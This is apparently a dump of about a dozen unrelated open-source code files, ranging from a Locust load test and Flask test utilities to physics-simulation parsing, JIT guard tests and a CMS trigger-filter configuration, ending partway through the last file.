from locust import HttpUser, between, task
class MyWebsiteUser(HttpUser):
wait_time = between(5, 15)
@task
def load_main(self):
self.client.get("/")
|
testing/utilities/client.py | boidolr/git-code-debt | 213 | 12718721 | import json
from typing import TYPE_CHECKING
import flask.testing
import pyquery
class Response:
"""A Response wraps a response from a testing Client."""
def __init__(self, response):
self.response = response
@property
def text(self):
return self.response.data.decode(self.response.charset)
@property
def pq(self):
return pyquery.PyQuery(self.text)
@property
def json(self):
return json.loads(self.text)
if TYPE_CHECKING:
ClientBase = flask.testing.FlaskClient[Response]
else:
ClientBase = flask.testing.FlaskClient
class Client(ClientBase):
"""A Client wraps the client given by flask to add other utilities."""
def open(self, *args, **kwargs):
return Response(super().open(*args, **kwargs))
|
core/utils/farthest_points_torch.py | AlbertoRemus/GDR_Net | 132 | 12718725 | # https://github.com/NVlabs/latentfusion/blob/master/latentfusion/three/utils.py
import torch
from torch.nn import functional as F
def farthest_points(
data,
n_clusters: int,
dist_func=F.pairwise_distance,
return_center_indexes=True,
return_distances=False,
verbose=False,
init_center=True,
):
"""Performs farthest point sampling on data points.
Args:
data (torch.tensor): data points.
n_clusters (int): number of clusters.
dist_func (Callable): distance function that is used to compare two data points.
return_center_indexes (bool): if True, returns the indexes of the center of clusters.
return_distances (bool): if True, return distances of each point from centers.
Returns clusters, [centers, distances]:
clusters (torch.tensor): the cluster index for each element in data.
centers (torch.tensor): the integer index of each center.
distances (torch.tensor): closest distances of each point to any of the cluster centers.
"""
if n_clusters >= data.shape[0]:
if return_center_indexes:
return (torch.arange(data.shape[0], dtype=torch.long), torch.arange(data.shape[0], dtype=torch.long))
return torch.arange(data.shape[0], dtype=torch.long)
clusters = torch.full((data.shape[0],), fill_value=-1, dtype=torch.long)
centers = torch.zeros(n_clusters, dtype=torch.long)
if init_center:
broadcasted_data = torch.mean(data, 0, keepdim=True).expand(data.shape[0], -1)
distances = dist_func(broadcasted_data, data)
else:
distances = torch.full((data.shape[0],), fill_value=1e7, dtype=torch.float32)
for i in range(n_clusters):
center_idx = torch.argmax(distances)
centers[i] = center_idx
broadcasted_data = data[center_idx].unsqueeze(0).expand(data.shape[0], -1)
new_distances = dist_func(broadcasted_data, data)
distances = torch.min(distances, new_distances)
clusters[distances == new_distances] = i
if verbose:
print("farthest points max distance : {}".format(torch.max(distances)))
if return_center_indexes:
if return_distances:
return clusters, centers, distances
return clusters, centers
return clusters
def get_fps_and_center_torch(points, num_fps: int, init_center=True, dist_func=F.pairwise_distance):
center = torch.mean(points, 0, keepdim=True)
_, fps_inds = farthest_points(
points, n_clusters=num_fps, dist_func=dist_func, return_center_indexes=True, init_center=init_center
)
fps_pts = points[fps_inds]
return torch.cat([fps_pts, center], dim=0)
|
zentral/contrib/osquery/views/file_categories.py | arubdesu/zentral | 634 | 12718743 | <reponame>arubdesu/zentral<gh_stars>100-1000
import logging
from django.contrib.auth.mixins import PermissionRequiredMixin
from django.urls import reverse_lazy
from django.views.generic import CreateView, DeleteView, DetailView, ListView, UpdateView
from zentral.contrib.osquery.forms import FileCategoryForm
from zentral.contrib.osquery.models import FileCategory
logger = logging.getLogger('zentral.contrib.osquery.views.file_categories')
class FileCategoryListView(PermissionRequiredMixin, ListView):
permission_required = "osquery.view_filecategory"
model = FileCategory
def get_context_data(self, **kwargs):
ctx = super().get_context_data(**kwargs)
ctx["file_category_count"] = ctx["object_list"].count()
return ctx
class CreateFileCategoryView(PermissionRequiredMixin, CreateView):
permission_required = "osquery.add_filecategory"
model = FileCategory
form_class = FileCategoryForm
class FileCategoryView(PermissionRequiredMixin, DetailView):
permission_required = "osquery.view_filecategory"
model = FileCategory
def get_context_data(self, **kwargs):
ctx = super().get_context_data(**kwargs)
ctx["configurations"] = list(self.object.configuration_set.all().order_by("name", "pk"))
ctx["configuration_count"] = len(ctx["configurations"])
return ctx
class UpdateFileCategoryView(PermissionRequiredMixin, UpdateView):
permission_required = "osquery.change_filecategory"
model = FileCategory
form_class = FileCategoryForm
class DeleteFileCategoryView(PermissionRequiredMixin, DeleteView):
permission_required = "osquery.delete_filecategory"
model = FileCategory
success_url = reverse_lazy("osquery:file_categories")
|
kedro/extras/datasets/tracking/__init__.py | daniel-falk/kedro | 2,047 | 12718756 | """Dataset implementations to save data for Kedro Experiment Tracking"""
__all__ = ["MetricsDataSet", "JSONDataSet"]
from contextlib import suppress
with suppress(ImportError):
from kedro.extras.datasets.tracking.metrics_dataset import MetricsDataSet
with suppress(ImportError):
from kedro.extras.datasets.tracking.json_dataset import JSONDataSet
|
tests/stream/test_stream_3.py | vaartis/python-lz4 | 193 | 12718767 | import lz4.stream
import pytest
import sys
_1KB = 1024
_1MB = _1KB * 1024
_1GB = _1MB * 1024
def compress(x, c_kwargs):
c = []
with lz4.stream.LZ4StreamCompressor(**c_kwargs) as proc:
for start in range(0, len(x), c_kwargs['buffer_size']):
chunk = x[start:start + c_kwargs['buffer_size']]
block = proc.compress(chunk)
c.append(block)
if c_kwargs.get('return_bytearray', False):
return bytearray().join(c)
else:
return bytes().join(c)
def decompress(x, d_kwargs):
d = []
with lz4.stream.LZ4StreamDecompressor(**d_kwargs) as proc:
start = 0
while start < len(x):
block = proc.get_block(x[start:])
chunk = proc.decompress(block)
d.append(chunk)
start += d_kwargs['store_comp_size'] + len(block)
if d_kwargs.get('return_bytearray', False):
return bytearray().join(d)
else:
return bytes().join(d)
test_buffer_size = sorted(
[256,
1 * _1KB,
64 * _1KB,
1 * _1MB,
1 * _1GB,
lz4.stream.LZ4_MAX_INPUT_SIZE]
)
@pytest.fixture(
params=test_buffer_size,
ids=[
'buffer_size' + str(i) for i in range(len(test_buffer_size))
]
)
def buffer_size(request):
return request.param
test_data = [
(b'a' * _1MB),
]
@pytest.fixture(
params=test_data,
ids=[
'data' + str(i) for i in range(len(test_data))
]
)
def data(request):
return request.param
def test_block_decompress_mem_usage(data, buffer_size):
kwargs = {
'strategy': "double_buffer",
'buffer_size': buffer_size,
'store_comp_size': 4,
}
if sys.maxsize < 0xffffffff:
pytest.skip('Py_ssize_t too small for this test')
tracemalloc = pytest.importorskip('tracemalloc')
# Trace memory usage on compression
tracemalloc.start()
prev_snapshot = None
for i in range(1000):
compressed = compress(data, kwargs)
if i % 100 == 0:
snapshot = tracemalloc.take_snapshot()
if prev_snapshot:
# Filter on lz4.stream module'a allocations
stats = [x for x in snapshot.compare_to(prev_snapshot, 'lineno')
if lz4.stream.__file__ in x.traceback._frames[0][0]]
assert sum(map(lambda x: x.size_diff, stats)) < (1024 * 4)
prev_snapshot = snapshot
tracemalloc.stop()
tracemalloc.start()
prev_snapshot = None
for i in range(1000):
decompressed = decompress(compressed, kwargs) # noqa: F841
if i % 100 == 0:
snapshot = tracemalloc.take_snapshot()
if prev_snapshot:
# Filter on lz4.stream module'a allocations
stats = [x for x in snapshot.compare_to(prev_snapshot, 'lineno')
if lz4.stream.__file__ in x.traceback._frames[0][0]]
assert sum(map(lambda x: x.size_diff, stats)) < (1024 * 4)
prev_snapshot = snapshot
tracemalloc.stop()
|
warp/sim/import_snu.py | addy1997/warp | 306 | 12718776 | # Copyright (c) 2022 NVIDIA CORPORATION. All rights reserved.
# NVIDIA CORPORATION and its licensors retain all intellectual property
# and proprietary rights in and to this software, related documentation
# and any modifications thereto. Any use, reproduction, disclosure or
# distribution of this software and related documentation without an express
# license agreement from NVIDIA CORPORATION is strictly prohibited.
import math
import numpy as np
import os
import xml.etree.ElementTree as ET
import warp as wp
# SNU file format parser
class MuscleUnit:
def __init__(self):
self.name = ""
self.bones = []
self.points = []
class Skeleton:
def __init__(self, root_xform, skeleton_file, muscle_file, builder, filter, armature=0.0):
self.parse_skeleton(skeleton_file, builder, filter, root_xform, armature)
self.parse_muscles(muscle_file, builder)
def parse_skeleton(self, filename, builder, filter, root_xform, armature):
file = ET.parse(filename)
root = file.getroot()
self.node_map = {} # map node names to link indices
self.xform_map = {} # map node names to parent transforms
self.mesh_map = {} # map mesh names to link indices objects
self.coord_start = builder.joint_coord_count
self.dof_start = builder.joint_dof_count
type_map = {
"Ball": wp.sim.JOINT_BALL,
"Revolute": wp.sim.JOINT_REVOLUTE,
"Prismatic": wp.sim.JOINT_PRISMATIC,
"Free": wp.sim.JOINT_FREE,
"Fixed": wp.sim.JOINT_FIXED
}
builder.add_articulation()
for child in root:
if (child.tag == "Node"):
body = child.find("Body")
joint = child.find("Joint")
name = child.attrib["name"]
parent = child.attrib["parent"]
parent_X_s = wp.transform_identity()
if parent in self.node_map:
parent_link = self.node_map[parent]
parent_X_s = self.xform_map[parent]
else:
parent_link = -1
body_xform = body.find("Transformation")
joint_xform = joint.find("Transformation")
body_mesh = body.attrib["obj"]
body_size = np.fromstring(body.attrib["size"], sep=" ")
body_type = body.attrib["type"]
body_mass = body.attrib["mass"]
body_R_s = np.fromstring(body_xform.attrib["linear"], sep=" ").reshape((3,3))
body_t_s = np.fromstring(body_xform.attrib["translation"], sep=" ")
joint_R_s = np.fromstring(joint_xform.attrib["linear"], sep=" ").reshape((3,3))
joint_t_s = np.fromstring(joint_xform.attrib["translation"], sep=" ")
joint_type = type_map[joint.attrib["type"]]
joint_lower = np.array([-1.e+3])
joint_upper = np.array([1.e+3])
try:
joint_lower = np.fromstring(joint.attrib["lower"], sep=" ")
joint_upper = np.fromstring(joint.attrib["upper"], sep=" ")
except:
pass
if ("axis" in joint.attrib):
joint_axis = np.fromstring(joint.attrib["axis"], sep=" ")
else:
joint_axis = np.array((0.0, 0.0, 0.0))
body_X_s = wp.transform(body_t_s, wp.quat_from_matrix(body_R_s))
joint_X_s = wp.transform(joint_t_s, wp.quat_from_matrix(joint_R_s))
mesh_base = os.path.splitext(body_mesh)[0]
mesh_file = mesh_base + ".usd"
#-----------------------------------
# one time conversion, put meshes into local body space (and meter units)
# stage = Usd.Stage.Open("./assets/snu/OBJ/" + mesh_file)
# geom = UsdGeom.Mesh.Get(stage, "/" + mesh_base + "_obj/defaultobject/defaultobject")
# body_X_bs = wp.transform_inverse(body_X_s)
# joint_X_bs = wp.transform_inverse(joint_X_s)
# points = geom.GetPointsAttr().Get()
# for i in range(len(points)):
# p = wp.transform_point(joint_X_bs, points[i]*0.01)
# points[i] = Gf.Vec3f(p.tolist()) # cm -> meters
# geom.GetPointsAttr().Set(points)
# extent = UsdGeom.Boundable.ComputeExtentFromPlugins(geom, 0.0)
# geom.GetExtentAttr().Set(extent)
# stage.Save()
#--------------------------------------
link = -1
if len(filter) == 0 or name in filter:
joint_X_p = wp.transform_multiply(wp.transform_inverse(parent_X_s), joint_X_s)
body_X_c = wp.transform_multiply(wp.transform_inverse(joint_X_s), body_X_s)
if (parent_link == -1):
joint_X_p = wp.transform_identity()
# add link
link = builder.add_body(
parent=parent_link,
origin=wp.transform_multiply(root_xform, joint_X_s),
joint_xform=joint_X_p,
joint_axis=joint_axis,
joint_type=joint_type,
joint_target_ke=5.0,
joint_target_kd=2.0,
joint_limit_lower=joint_lower[0],
joint_limit_upper=joint_upper[0],
joint_limit_ke=1.e+3,
joint_limit_kd=1.e+2,
joint_armature=armature)
# add shape
shape = builder.add_shape_box(
body=link,
pos=body_X_c.p,
rot=body_X_c.q,
hx=body_size[0]*0.5,
hy=body_size[1]*0.5,
hz=body_size[2]*0.5,
ke=1.e+3*5.0,
kd=1.e+2*2.0,
kf=1.e+3,
mu=0.5)
# add lookup in name->link map
# save parent transform
self.xform_map[name] = joint_X_s
self.node_map[name] = link
self.mesh_map[mesh_base] = link
def parse_muscles(self, filename, builder):
# list of MuscleUnits
muscles = []
file = ET.parse(filename)
root = file.getroot()
self.muscle_start = len(builder.muscle_activation)
for child in root:
if (child.tag == "Unit"):
unit_name = child.attrib["name"]
unit_f0 = float(child.attrib["f0"])
unit_lm = float(child.attrib["lm"])
unit_lt = float(child.attrib["lt"])
unit_lmax = float(child.attrib["lmax"])
unit_pen = float(child.attrib["pen_angle"])
m = MuscleUnit()
m.name = unit_name
incomplete = False
for waypoint in child.iter("Waypoint"):
way_bone = waypoint.attrib["body"]
way_link = self.node_map[way_bone]
way_loc = np.fromstring(waypoint.attrib["p"], sep=" ", dtype=np.float32)
if (way_link == -1):
incomplete = True
break
# transform loc to joint local space
joint_X_s = self.xform_map[way_bone]
way_loc = wp.transform_point(wp.transform_inverse(joint_X_s), way_loc)
m.bones.append(way_link)
m.points.append(way_loc)
if not incomplete:
muscles.append(m)
builder.add_muscle(m.bones, m.points, f0=unit_f0, lm=unit_lm, lt=unit_lt, lmax=unit_lmax, pen=unit_pen)
self.muscles = muscles
def parse_snu(root_xform, skeleton_file, muscle_file, builder, filter, armature=0.0):
return Skeleton(root_xform, skeleton_file, muscle_file, builder, filter, armature=0.0)
|
atp-auto-core-open/atp/engine/api_report.py | rebecca1202/testAuto | 130 | 12718839 | <reponame>rebecca1202/testAuto<filename>atp-auto-core-open/atp/engine/api_report.py
# -*- coding:utf-8 -*-
import datetime
from atp.api.comm_log import logger
from atp.api.mysql_manager import (
ApiTestReportManager as arm, ApiTestcaseInfoManager as atim,
ApiTestcaseMainManager as atmm
)
from atp.utils.tools import get_current_time
def perfect_summary(summary, test_meta_list):
# summary['stat']['successes'] = 996
intf_id = test_meta_list.pop(0)['intf_id']
step_list = []
for testcase in test_meta_list:
step_list.extend(testcase['step'])
# print('step_list:{}'.format(step_list))
# assert len(step_list) == len(summary['details'][0]['records'])
assert len(step_list) == len(summary['details'])
# for step in summary['details'][0]['records']:
# step_meta = step_list.pop(0)
# step['testcase_name'] = step_meta['testcase_name']
# if 'error_detail' in step_meta:
# pass
for step in summary['details']:
step['intf_id'] = intf_id
for casename in step_list:
step["records"][0]['testcase_name'] = casename['testcase_name']
def save_report(report_path, runner_summary, project_id, report_id=None, is_main=False):
"""保存测试报告"""
# 没有report_path,代表运行以非正常状态结束,未生成测试报告
if not report_path:
status = 'error'
if report_id:
arm.update_report(report_id, status=status)
for detail in runner_summary['details']:
is_success = 0 if detail['stat']['failures'] == 0 else 1
if is_main:
atmm.update_testcase_main(detail['case_id'], last_run=is_success)
else:
atim.update_testcase(detail['case_id'], last_run=is_success)
return
# start_at = datetime.datetime.strftime(runner_summary['time']['start_at'], '%Y-%m-%d %H:%M:%S')
start_at = (runner_summary['time']['start_at'])
duration = '{:.2f}'.format(runner_summary['time']['duration'])
status = 'fail' if runner_summary['stat']['failures'] else 'success'
# report = str(runner_summary)
report = ''
if report_id:
# 异步运行,已有测试报告id
arm.update_report(report_id, start_at=start_at, duration=duration, status=status, run_type='0', report=report,
url=report_path, api_project_id=project_id)
else:
# 同步运行,无测试报告id
arm.insert_report(start_at=start_at, duration=duration, status=status, run_type='0', report=report,
url=report_path, api_project_id=project_id)
def save_last_run(summary, is_main=False):
for detail in summary['details']:
is_success = 0 if detail['stat']['failures'] == 0 else 1
if is_main:
atmm.update_testcase_main(detail['case_id'], last_run=is_success, last_run_time=get_current_time())
else:
atim.update_testcase(detail['case_id'], last_run=is_success, last_run_time=get_current_time())
|
intro/summary-exercises/examples/plot_optimize_lidar_complex_data.py | zmoon/scipy-lecture-notes | 2,538 | 12718868 | """
The lidar system, data (2 of 2 datasets)
========================================
Generate a chart of more complex data recorded by the lidar system
"""
import numpy as np
import matplotlib.pyplot as plt
waveform_2 = np.load('waveform_2.npy')
t = np.arange(len(waveform_2))
fig, ax = plt.subplots(figsize=(8, 6))
plt.plot(t, waveform_2)
plt.xlabel('Time [ns]')
plt.ylabel('Amplitude [bins]')
plt.show()
|
doc/make_doc_plots.py | varman-m/eeg_notebooks_doc | 154 | 12718880 | """Create the images for the FOOOF documentation."""
import shutil
import numpy as np
import matplotlib.pyplot as plt
from fooof import FOOOF, FOOOFGroup
from fooof.sim.gen import gen_power_spectrum
from fooof.plts.utils import check_ax
from fooof.plts.spectra import plot_spectrum
from fooof.utils.download import load_fooof_data
###################################################################################################
###################################################################################################
def main():
## Individual Model Plot
# Download examples data files needed for this example
freqs = load_fooof_data('freqs.npy', folder='data')
spectrum = load_fooof_data('spectrum.npy', folder='data')
# Initialize and fit an example power spectrum model
fm = FOOOF(peak_width_limits=[1, 6], max_n_peaks=6, min_peak_height=0.2, verbose=False)
fm.fit(freqs, spectrum, [3, 40])
# Save out the report
fm.save_report('FOOOF_report.png', 'img')
## Group Plot
# Download examples data files needed for this example
freqs = load_fooof_data('group_freqs.npy', folder='data')
spectra = load_fooof_data('group_powers.npy', folder='data')
# Initialize and fit a group of example power spectrum models
fg = FOOOFGroup(peak_width_limits=[1, 6], max_n_peaks=6, min_peak_height=0.2, verbose=False)
fg.fit(freqs, spectra, [3, 30])
# Save out the report
fg.save_report('FOOOFGroup_report.png', 'img')
## Make the icon plot
# Simulate an example power spectrum
fs, ps = gen_power_spectrum([4, 35], [0, 1], [[10, 0.3, 1],[22, 0.15, 1.25]], nlv=0.01)
def custom_style(ax, log_freqs, log_powers):
"""Custom styler-function for the icon plot."""
# Set the top and right side frame & ticks off
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
# Set linewidth of remaining spines
ax.spines['left'].set_linewidth(10)
ax.spines['bottom'].set_linewidth(10)
ax.set_xticks([], [])
ax.set_yticks([], [])
# Create and save out the plot
plot_spectrum(fs, ps, log_freqs=False, log_powers=True, lw=12, alpha=0.8,
color='grey', plot_style=custom_style, ax=check_ax(None, [6, 6]))
plt.tight_layout()
plt.savefig('img/spectrum.png')
## Clean Up
# Remove the data folder
shutil.rmtree('data')
if __name__ == "__main__":
main()
|
upvote/gae/modules/upvote_app/api/web/users_test.py | iwikmai/upvote | 453 | 12718902 | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for users.py."""
import httplib
import webapp2
from upvote.gae.datastore import test_utils
from upvote.gae.lib.testing import basetest
from upvote.gae.modules.upvote_app.api.web import users
from upvote.gae.utils import user_utils
class UsersTest(basetest.UpvoteTestCase):
"""Base class for User handler tests."""
def setUp(self):
app = webapp2.WSGIApplication(routes=[users.ROUTES])
super(UsersTest, self).setUp(wsgi_app=app)
self.PatchValidateXSRFToken()
class UserQueryHandlerTest(UsersTest):
ROUTE = '/users/query'
def testAdminGetList(self):
"""Admin retrieves list of all users."""
user_count = 10
test_utils.CreateUsers(user_count)
with self.LoggedInUser(admin=True):
response = self.testapp.get(self.ROUTE)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertLen(output['content'], user_count)
def testAdminGetListPlatformNoEffect(self):
"""Admin specifies a platform which has no effect on the results."""
params = {'platform': 'santa'}
user_count = 10
test_utils.CreateUsers(user_count)
with self.LoggedInUser(admin=True):
response = self.testapp.get(self.ROUTE, params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertLen(output['content'], user_count)
def testUserGetListNoPermissions(self):
"""Normal user attempts to retrieve all users."""
with self.LoggedInUser():
self.testapp.get(self.ROUTE, status=httplib.FORBIDDEN)
def testAdminGetQuery(self):
"""Admin queries a user."""
params = {'search': 1, 'searchBase': 'voteWeight'}
user_count = 10
test_utils.CreateUsers(user_count)
with self.LoggedInUser(admin=True):
response = self.testapp.get(self.ROUTE, params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertLen(output['content'], user_count)
def testUserGetQueryNoPermissions(self):
"""Normal user queries a rule."""
params = {'search': 1, 'searchBase': 'voteWeight'}
with self.LoggedInUser():
self.testapp.get(self.ROUTE, params, status=httplib.FORBIDDEN)
class UserHandlerTest(UsersTest):
ROUTE = '/users/%s'
def testAdminGetSelf(self):
"""Admin getting own information."""
with self.LoggedInUser(admin=True) as admin:
response = self.testapp.get(self.ROUTE % admin.email)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertTrue(output['isAdmin'])
self.assertEqual(output['name'], admin.nickname)
def testAdminGetOtherUser(self):
"""Admin getting information on another user."""
user = test_utils.CreateUser()
with self.LoggedInUser(admin=True):
response = self.testapp.get(self.ROUTE % user.email)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertFalse(output['isAdmin'])
self.assertEqual(output['name'], user.nickname)
def testAdminGetUnknownUser(self):
"""Admin attempting to get information on an unknown user."""
with self.LoggedInUser(admin=True):
unknown_user = user_utils.UsernameToEmail('blahblahblah')
self.testapp.get(self.ROUTE % unknown_user, status=httplib.NOT_FOUND)
def testUserGetOtherUser(self):
"""Normal user trying to get information on another user."""
user = test_utils.CreateUser()
with self.LoggedInUser():
self.testapp.get(self.ROUTE % user.email, status=httplib.FORBIDDEN)
if __name__ == '__main__':
basetest.main()
|
rpython/jit/backend/llsupport/test/test_zrpy_gc_direct.py | m4sterchain/mesapy | 381 | 12718917 | <filename>rpython/jit/backend/llsupport/test/test_zrpy_gc_direct.py
from rpython.jit.backend.detect_cpu import getcpuclass
from rpython.jit.tool.oparser import parse
from rpython.jit.metainterp.history import JitCellToken, NoStats
from rpython.jit.metainterp.history import BasicFinalDescr, BasicFailDescr
from rpython.jit.metainterp.gc import get_description
from rpython.jit.metainterp.optimize import SpeculativeError
from rpython.annotator.listdef import s_list_of_strings
from rpython.rtyper.lltypesystem import lltype, llmemory, rffi
from rpython.rtyper.rclass import getclassrepr, getinstancerepr
from rpython.translator.unsimplify import call_initial_function
from rpython.translator.translator import TranslationContext
from rpython.translator.c import genc
def run_guards_translated(gcremovetypeptr):
class A(object):
pass
class B(A):
pass
class C(B):
pass
def main(argv):
A(); B().foo = len(argv); C()
return 0
t = TranslationContext()
t.config.translation.gc = "minimark"
t.config.translation.gcremovetypeptr = gcremovetypeptr
ann = t.buildannotator()
ann.build_types(main, [s_list_of_strings], main_entry_point=True)
rtyper = t.buildrtyper()
rtyper.specialize()
classdef = ann.bookkeeper.getuniqueclassdef(B)
rclass = getclassrepr(rtyper, classdef)
rinstance = getinstancerepr(rtyper, classdef)
LLB = rinstance.lowleveltype.TO
ptr_vtable_B = rclass.getvtable()
adr_vtable_B = llmemory.cast_ptr_to_adr(ptr_vtable_B)
vtable_B = llmemory.cast_adr_to_int(adr_vtable_B, mode="symbolic")
CPU = getcpuclass()
cpu = CPU(rtyper, NoStats(),
translate_support_code=True,
gcdescr=get_description(t.config))
execute_token = cpu.make_execute_token(llmemory.GCREF)
finaldescr = BasicFinalDescr()
faildescr = BasicFailDescr()
descr_B = cpu.sizeof(LLB, ptr_vtable_B)
typeid_B = descr_B.get_type_id()
fielddescr_B = cpu.fielddescrof(LLB, 'inst_foo')
LLD = lltype.GcStruct('D', ('dd', lltype.Signed))
descr_D = cpu.sizeof(LLD)
fielddescr_D = cpu.fielddescrof(LLD, 'dd')
ARRAY = lltype.GcArray(lltype.Signed)
arraydescr = cpu.arraydescrof(ARRAY)
loop1 = parse("""
[p0]
guard_class(p0, ConstInt(vtable_B), descr=faildescr) []
finish(descr=finaldescr)
""", namespace={'finaldescr': finaldescr,
'faildescr': faildescr,
'vtable_B': vtable_B})
loop2 = parse("""
[p0]
guard_gc_type(p0, ConstInt(typeid_B), descr=faildescr) []
finish(descr=finaldescr)
""", namespace={'finaldescr': finaldescr,
'faildescr': faildescr,
'typeid_B': typeid_B})
loop3 = parse("""
[p0]
guard_is_object(p0, descr=faildescr) []
finish(descr=finaldescr)
""", namespace={'finaldescr': finaldescr,
'faildescr': faildescr})
loop4 = parse("""
[p0]
guard_subclass(p0, ConstInt(vtable_B), descr=faildescr) []
finish(descr=finaldescr)
""", namespace={'finaldescr': finaldescr,
'faildescr': faildescr,
'vtable_B': vtable_B})
def g():
cpu.setup_once()
token1 = JitCellToken()
token2 = JitCellToken()
token3 = JitCellToken()
token4 = JitCellToken()
cpu.compile_loop(loop1.inputargs, loop1.operations, token1)
cpu.compile_loop(loop2.inputargs, loop2.operations, token2)
cpu.compile_loop(loop3.inputargs, loop3.operations, token3)
cpu.compile_loop(loop4.inputargs, loop4.operations, token4)
for token, p0 in [
(token1, rffi.cast(llmemory.GCREF, A())),
(token1, rffi.cast(llmemory.GCREF, B())),
(token1, rffi.cast(llmemory.GCREF, C())),
(token2, rffi.cast(llmemory.GCREF, A())),
(token2, rffi.cast(llmemory.GCREF, B())),
(token2, rffi.cast(llmemory.GCREF, C())),
(token2, rffi.cast(llmemory.GCREF, [42, 43])),
(token3, rffi.cast(llmemory.GCREF, A())),
(token3, rffi.cast(llmemory.GCREF, B())),
(token3, rffi.cast(llmemory.GCREF, [44, 45])),
(token4, rffi.cast(llmemory.GCREF, A())),
(token4, rffi.cast(llmemory.GCREF, B())),
(token4, rffi.cast(llmemory.GCREF, C())),
]:
frame = execute_token(token, p0)
descr = cpu.get_latest_descr(frame)
if descr is finaldescr:
print 'match'
elif descr is faildescr:
print 'fail'
else:
print '???'
#
if token is token2: # guard_gc_type
print int(cpu.get_actual_typeid(p0) == typeid_B)
if token is token3: # guard_is_object
print int(cpu.check_is_object(p0))
for p0 in [lltype.nullptr(llmemory.GCREF.TO),
rffi.cast(llmemory.GCREF, A()),
rffi.cast(llmemory.GCREF, B()),
rffi.cast(llmemory.GCREF, C()),
rffi.cast(llmemory.GCREF, lltype.malloc(LLD)),
rffi.cast(llmemory.GCREF, lltype.malloc(ARRAY, 5)),
rffi.cast(llmemory.GCREF, "foobar"),
rffi.cast(llmemory.GCREF, u"foobaz")]:
results = ['B', 'D', 'A', 'S', 'U']
try:
cpu.protect_speculative_field(p0, fielddescr_B)
except SpeculativeError:
results[0] = '-'
try:
cpu.protect_speculative_field(p0, fielddescr_D)
except SpeculativeError:
results[1] = '-'
try:
cpu.protect_speculative_array(p0, arraydescr)
except SpeculativeError:
results[2] = '-'
try:
cpu.protect_speculative_string(p0)
except SpeculativeError:
results[3] = '-'
try:
cpu.protect_speculative_unicode(p0)
except SpeculativeError:
results[4] = '-'
print ''.join(results)
call_initial_function(t, g)
cbuilder = genc.CStandaloneBuilder(t, main, t.config)
cbuilder.generate_source(defines=cbuilder.DEBUG_DEFINES)
cbuilder.compile()
data = cbuilder.cmdexec('')
assert data == ('fail\n'
'match\n'
'fail\n'
'fail\n' '0\n'
'match\n' '1\n'
'fail\n' '0\n'
'fail\n' '0\n'
'match\n' '1\n'
'match\n' '1\n'
'fail\n' '0\n'
'fail\n'
'match\n'
'match\n'
'-----\n' # null
'-----\n' # instance of A
'B----\n' # instance of B
'B----\n' # instance of C
'-D---\n'
'--A--\n'
'---S-\n'
'----U\n'
)
def test_guards_translated_with_gctypeptr():
run_guards_translated(gcremovetypeptr=False)
def test_guards_translated_without_gctypeptr():
run_guards_translated(gcremovetypeptr=True)
|
HLTrigger/HLTfilters/test/hltHighLevel.py | ckamtsikis/cmssw | 852 | 12718931 | <filename>HLTrigger/HLTfilters/test/hltHighLevel.py
import FWCore.ParameterSet.Config as cms
process = cms.Process('TEST')
process.options = cms.untracked.PSet(
wantSummary = cms.untracked.bool(True)
)
process.load('FWCore.MessageService.MessageLogger_cfi')
process.MessageLogger.cerr.INFO = cms.untracked.PSet(
reportEvery = cms.untracked.int32(1), # every!
limit = cms.untracked.int32(-1) # no limit!
)
process.MessageLogger.cerr.FwkReport.reportEvery = 10 # only report every 10th event start
process.MessageLogger.cerr_stats.threshold = 'INFO' # also info in statistics
# read back the trigger decisions
process.source = cms.Source('PoolSource',
fileNames = cms.untracked.vstring('file:trigger.root')
)
import HLTrigger.HLTfilters.hltHighLevel_cfi as hlt
# accept if 'path_1' succeeds
process.filter_1 = hlt.hltHighLevel.clone(
HLTPaths = [ 'path_1'],
throw = False
)
# accept if 'path_2' succeeds
process.filter_2 = hlt.hltHighLevel.clone(
HLTPaths = ['path_2'],
throw = False
)
# accept if 'path_3' succeeds
process.filter_3 = hlt.hltHighLevel.clone(
HLTPaths = ['path_3'],
throw = False
)
# accept if any path succeeds (implicit)
process.filter_any_implicit = hlt.hltHighLevel.clone(
# HLTPaths = [], # empty is default
throw = False
)
# accept if any path succeeds (explicit)
process.filter_any_explicit = hlt.hltHighLevel.clone(
HLTPaths = ['path_1', 'path_2', 'path_3'],
throw = False
)
# accept if any path succeeds (wildcard, '*')
process.filter_any_star = hlt.hltHighLevel.clone(
HLTPaths = ['p*'],
throw = False
)
# accept if any path succeeds (wildcard, twice '*')
process.filter_any_doublestar = hlt.hltHighLevel.clone(
HLTPaths = ['p*t*'],
throw = False
)
# accept if any path succeeds (wildcard, '?')
process.filter_any_question = hlt.hltHighLevel.clone(
HLTPaths = ['path_?'],
throw = False
)
# accept if all path succeed (implicit)
process.filter_all_implicit = hlt.hltHighLevel.clone(
#HLTPaths = [], # empty is default
andOr = False,
throw = False
)
# accept if all path succeed (explicit)
process.filter_all_explicit = hlt.hltHighLevel.clone(
HLTPaths = ['path_1', 'path_2', 'path_3'],
andOr = False,
throw = False
)
# accept if all path succeed (wildcard, '*')
process.filter_all_star = hlt.hltHighLevel.clone(
HLTPaths = ['p*'],
andOr = False,
throw = False
)
# accept if all path succeed (wildcard, '*')
process.filter_all_doublestar = hlt.hltHighLevel.clone(
HLTPaths = ['p*t*'],
andOr = False,
throw = False
)
# accept if all path succeed (wildcard, '?')
process.filter_all_question = hlt.hltHighLevel.clone(
HLTPaths = ['path_?'],
andOr = False,
throw = False
)
# wrong L1 name (explicit)
process.filter_wrong_name = hlt.hltHighLevel.clone(
HLTPaths = ['path_wrong'],
throw = False
)
# wrong L1 name (wildcard)
